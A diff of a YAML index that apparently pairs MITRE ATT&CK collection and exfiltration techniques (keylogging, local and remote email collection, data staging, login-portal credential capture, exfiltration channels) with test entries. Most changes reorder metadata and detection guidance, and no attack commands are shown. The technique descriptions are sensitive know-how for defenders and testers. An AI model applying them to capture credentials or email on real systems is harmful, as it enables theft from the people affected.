- monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- and ensuring no unauthorized drivers or kernel modules that could indicate
- keylogging or API hooking are present.'
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
x_mitre_data_sources:
- Windows Registry
- Windows event logs
@@ -47463,12 +48934,39 @@ collection:
- DLL monitoring
- Binary file metadata
- API monitoring
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_version: '1.1'
+ x_mitre_detection: 'Detection may vary depending on how input is captured but
+ may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
+ `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
+ monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+ and ensuring no unauthorized drivers or kernel modules that could indicate
+ keylogging or API hooking are present.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1056.001:
technique:
+ id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
+ description: |-
+ Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
+
+ Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
+
+ * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
+ * Reading raw keystroke data from the hardware buffer.
+ * Windows Registry modifications.
+ * Custom drivers.
+ name: Keylogging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1056.001
@@ -47480,20 +48978,6 @@ collection:
description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
look into keyloggers on Windows. Retrieved April 27, 2016.'
source_name: Adventures of a Keystroke
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Keylogging
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
- id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -47634,26 +49118,26 @@ collection:
phase_name: collection
modified: '2020-03-31T13:54:08.239Z'
created: '2020-02-11T19:08:51.677Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Eric Kuehn, Secure Ideas
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - Packet capture
- - Netflow/Enclave netflow
- x_mitre_contributors:
- - Eric Kuehn, Secure Ideas
- - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1074.001:
technique:
@@ -47675,25 +49159,22 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T16:38:51.557Z'
+ modified: '2020-05-26T19:23:54.854Z'
created: '2020-03-13T21:13:10.467Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1074.001
atomic_tests:
- name: Stage data from Discovery.bat
@@ -47764,6 +49245,21 @@ collection:
name: powershell
T1114.001:
technique:
+ created: '2020-02-19T18:46:06.098Z'
+ modified: '2020-03-24T17:59:20.983Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
+ description: |-
+ Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
+
+ Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
+ name: Local Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1114.001
@@ -47776,21 +49272,6 @@ collection:
url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
.ost). Retrieved February 19, 2020.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Local Email Collection
- description: |-
- Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
-
- Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\Users\\Documents\Outlook Files` or `C:\Users\\AppData\Local\Microsoft\Outlook`.(Citation: Microsoft Outlook Files)
- id: attack-pattern--1e9eb839-294b-48cc-b0d3-c45555a2a004
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-03-24T17:59:20.983Z'
- created: '2020-02-19T18:46:06.098Z'
x_mitre_platforms:
- Windows
x_mitre_data_sources:
@@ -47882,27 +49363,28 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-07-18T15:36:27.346Z'
+ modified: '2020-07-14T19:39:44.590Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Justin Warner, ICEBRG
+ x_mitre_data_sources:
+ - Authentication logs
+ - Packet capture
+ - Process monitoring
+ - API monitoring
x_mitre_detection: This is a difficult technique to detect because adversary
traffic would be masked by normal user traffic. No new processes are created
and no additional software touches disk. Authentication logs can be used to
audit logins to specific web applications, but determining malicious logins
versus benign logins may be difficult if activity matches typical user behavior.
Monitor for process injection against browser applications
- x_mitre_data_sources:
- - Authentication logs
- - Packet capture
- - Process monitoring
- - API monitoring
- x_mitre_contributors:
- - Justin Warner, ICEBRG
- x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1557:
technique:
@@ -47934,23 +49416,23 @@ collection:
phase_name: collection
modified: '2020-03-31T13:54:08.535Z'
created: '2020-02-11T19:07:12.114Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_detection: Monitor network traffic for anomalies associated with known
+ MiTM behavior. Consider monitoring for modifications to system configuration
+ files involved in shaping network traffic flow.
x_mitre_data_sources:
- File monitoring
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Monitor network traffic for anomalies associated with known
- MiTM behavior. Consider monitoring for modifications to system configuration
- files involved in shaping network traffic flow.
- x_mitre_contributors:
- - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1074.002:
technique:
@@ -47958,6 +49440,10 @@ collection:
- source_name: mitre-attack
external_id: T1074.002
url: https://attack.mitre.org/techniques/T1074/002
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -47965,14 +49451,28 @@ collection:
description: |-
Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
+ In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
+
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections made to their C2 server and better evade detection.
id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2020-03-24T17:21:15.741Z'
+ modified: '2020-06-24T18:59:15.833Z'
created: '2020-03-13T21:14:58.206Z'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
+
+ Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
x_mitre_platforms:
- Linux
- macOS
@@ -47980,40 +49480,30 @@ collection:
- AWS
- GCP
- Azure
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- x_mitre_detection: |-
- Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
-
- Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1114.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1114.002
- url: https://attack.mitre.org/techniques/T1114/002
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Email Collection
+ created: '2020-02-19T18:52:24.547Z'
+ modified: '2020-02-19T20:53:50.908Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ type: attack-pattern
+ id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
description: Adversaries may target an Exchange server or Office 365 to collect
sensitive information. Adversaries may leverage a user's credentials and interact
directly with the Exchange server to acquire information from within a network.
Adversaries may also access externally facing Exchange services or Office
365 to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413)
can be used to automate searches for specific keywords.
- id: attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- modified: '2020-02-19T20:53:50.908Z'
- created: '2020-02-19T18:52:24.547Z'
+ name: Remote Email Collection
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1114.002
+ url: https://attack.mitre.org/techniques/T1114/002
x_mitre_platforms:
- Office 365
- Windows
@@ -48065,10 +49555,12 @@ collection:
phase_name: collection
modified: '2020-03-24T19:56:37.627Z'
created: '2017-05-31T21:31:25.060Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - API monitoring
+ - Process monitoring
+ - File monitoring
x_mitre_detection: Monitoring for screen capture behavior will depend on the
method used to obtain data from the operating system and write output files.
Detection methods could include collecting information from unusual processes
@@ -48076,12 +49568,10 @@ collection:
written to disk. The sensor data may need to be correlated with other events
to identify malicious activity, depending on the legitimacy of this behavior
within a given network environment.
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - File monitoring
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1113
atomic_tests:
- name: Screencapture
@@ -48197,17 +49687,6 @@ collection:
phase_name: collection
modified: '2020-03-24T16:41:00.821Z'
created: '2020-02-14T13:35:32.938Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
- - Application logs
x_mitre_detection: "The user access logging within Microsoft's SharePoint can
be configured to report access to certain pages and documents. (Citation:
Microsoft SharePoint Logging). As information repositories generally have
@@ -48221,6 +49700,17 @@ collection:
programmatic means being used to retrieve all data within the repository.
In environments with high-maturity, it may be possible to leverage User-Behavioral
Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ - Application logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - Office 365
atomic_tests: []
T1125:
technique:
@@ -48249,27 +49739,36 @@ collection:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- modified: '2019-07-17T21:14:04.412Z'
+ modified: '2020-07-14T19:40:47.644Z'
created: '2017-05-31T21:31:37.917Z'
- x_mitre_platforms:
- - Windows
- - macOS
- x_mitre_permissions_required:
- - User
- x_mitre_detection: |-
- Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
-
- Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
x_mitre_data_sources:
- Process monitoring
- File monitoring
- API monitoring
- x_mitre_contributors:
- - Praetorian
- x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.
+
+ Behavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the video camera, recording devices, or recording software, and a process periodically writing files to disk that contain video or camera image data.
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ - macOS
atomic_tests: []
T1056.003:
technique:
+ created: '2020-02-11T18:59:50.058Z'
+ modified: '2020-03-24T21:16:16.580Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
description: |-
Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -48290,27 +49789,19 @@ collection:
description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco
Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.'
source_name: Volexity Virtual Private Keylogging
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T21:16:16.580Z'
- created: '2020-02-11T18:59:50.058Z'
- x_mitre_system_requirements:
- - An externally facing login portal is configured.
- x_mitre_data_sources:
- - File monitoring
- x_mitre_detection: File monitoring may be used to detect changes to files in
- the Web directory for organization login pages that do not match with authorized
- updates to the Web server's content.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: File monitoring may be used to detect changes to files in
+ the Web directory for organization login pages that do not match with authorized
+ updates to the Web server's content.
+ x_mitre_data_sources:
+ - File monitoring
+ x_mitre_system_requirements:
+ - An externally facing login portal is configured.
atomic_tests: []
exfiltration:
T1020:
@@ -48336,20 +49827,20 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-11T13:58:08.219Z'
created: '2017-05-31T21:30:29.458Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- - Process use of network
- x_mitre_detection: Monitor process file access patterns and network behavior.
- Unrecognized processes or scripts that appear to be traversing file systems
- and sending network traffic may be suspicious.
- x_mitre_network_requirements: true
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_detection: Monitor process file access patterns and network behavior.
+ Unrecognized processes or scripts that appear to be traversing file systems
+ and sending network traffic may be suspicious.
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process use of network
+ x_mitre_version: '1.1'
identifier: T1020
atomic_tests:
- name: IcedID Botnet HTTP PUT
@@ -48402,14 +49893,14 @@ exfiltration:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: exfiltration
- modified: '2019-06-24T12:03:02.387Z'
+ modified: '2020-07-14T19:47:46.912Z'
created: '2017-05-31T21:30:34.523Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Packet capture
- - Netflow/Enclave netflow
- - Process use of network
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). If a process
maintains a long connection during which it consistently sends fixed size
@@ -48419,11 +49910,12 @@ exfiltration:
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
+ x_mitre_version: '1.0'
identifier: T1030
atomic_tests:
- name: Data Transfer Size Limits
@@ -48495,27 +49987,27 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:50:31.548Z'
created: '2017-05-31T21:30:44.720Z'
- x_mitre_is_subtechnique: false
- x_mitre_contributors:
- - Alfredo Abarca
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
- x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server). Processes
- utilizing the network that do not normally have network communication or have
- never been seen before are suspicious. Analyze packet contents to detect communications
- that do not follow the expected protocol behavior for the port that is being
- used. (Citation: University of Birmingham C2)'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- Process monitoring
- Process use of network
- Packet capture
- Netflow/Enclave netflow
- Network protocol analysis
- x_mitre_version: '1.2'
+ x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. Analyze packet contents to detect communications
+ that do not follow the expected protocol behavior for the port that is being
+ used. (Citation: University of Birmingham C2)'
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_contributors:
+ - Alfredo Abarca
+ x_mitre_is_subtechnique: false
identifier: T1048
atomic_tests:
- name: Exfiltration Over Alternative Protocol - SSH
@@ -48603,23 +50095,23 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:45:51.014Z'
created: '2020-03-15T15:34:30.767Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious.(Citation: University of Birmingham
C2) '
- x_mitre_network_requirements: true
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Packet capture
+ - Process use of network
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1011.001:
technique:
@@ -48642,24 +50134,34 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:34:55.439Z'
created: '2020-03-09T17:07:57.392Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Process monitoring
- - User interface
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_detection: |-
Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process monitoring
+ - User interface
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1041:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:30:41.804Z'
+ modified: '2020-03-12T15:59:47.470Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: exfiltration
+ type: attack-pattern
+ id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Exfiltration Over C2 Channel
+ description: Adversaries may steal data by exfiltrating it over an existing
+ command and control channel. Stolen data is encoded into the normal communications
+ channel using the same protocol as command and control communications.
external_references:
- source_name: mitre-attack
external_id: T1041
@@ -48668,18 +50170,8 @@ exfiltration:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: Adversaries may steal data by exfiltrating it over an existing
- command and control channel. Stolen data is encoded into the normal communications
- channel using the same protocol as command and control communications.
- name: Exfiltration Over C2 Channel
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: exfiltration
- modified: '2020-03-12T15:59:47.470Z'
- created: '2017-05-31T21:30:41.804Z'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_platforms:
- Linux
- macOS
@@ -48720,22 +50212,22 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:35:24.570Z'
created: '2017-05-31T21:30:25.159Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - User interface
- - Process monitoring
- x_mitre_contributors:
- - Itzik Kotler, SafeBreach
- x_mitre_detection: |-
- Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
-
- Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.
- x_mitre_network_requirements: true
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: true
+ x_mitre_detection: |-
+ Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
+
+ Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.
+ x_mitre_contributors:
+ - Itzik Kotler, SafeBreach
+ x_mitre_data_sources:
+ - User interface
+ - Process monitoring
+ x_mitre_version: '1.1'
atomic_tests: []
T1052:
technique:
@@ -48761,21 +50253,21 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:31:48.713Z'
created: '2017-05-31T21:30:46.461Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Process monitoring
- - Data loss prevention
- - File monitoring
- x_mitre_detection: Monitor file access on removable media. Detect processes
- that execute when removable media are mounted.
- x_mitre_network_requirements: false
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Presence of physical medium or device
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_system_requirements:
- - Presence of physical medium or device
- x_mitre_is_subtechnique: false
+ x_mitre_network_requirements: false
+ x_mitre_detection: Monitor file access on removable media. Detect processes
+ that execute when removable media are mounted.
+ x_mitre_data_sources:
+ - Process monitoring
+ - Data loss prevention
+ - File monitoring
+ x_mitre_version: '1.1'
atomic_tests: []
T1048.001:
technique:
@@ -48811,16 +50303,9 @@ exfiltration:
phase_name: exfiltration
modified: '2020-03-28T00:43:24.228Z'
created: '2020-03-15T15:30:42.378Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Malware reverse engineering
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Packet capture
- - Process use of network
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_network_requirements: true
x_mitre_detection: "Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
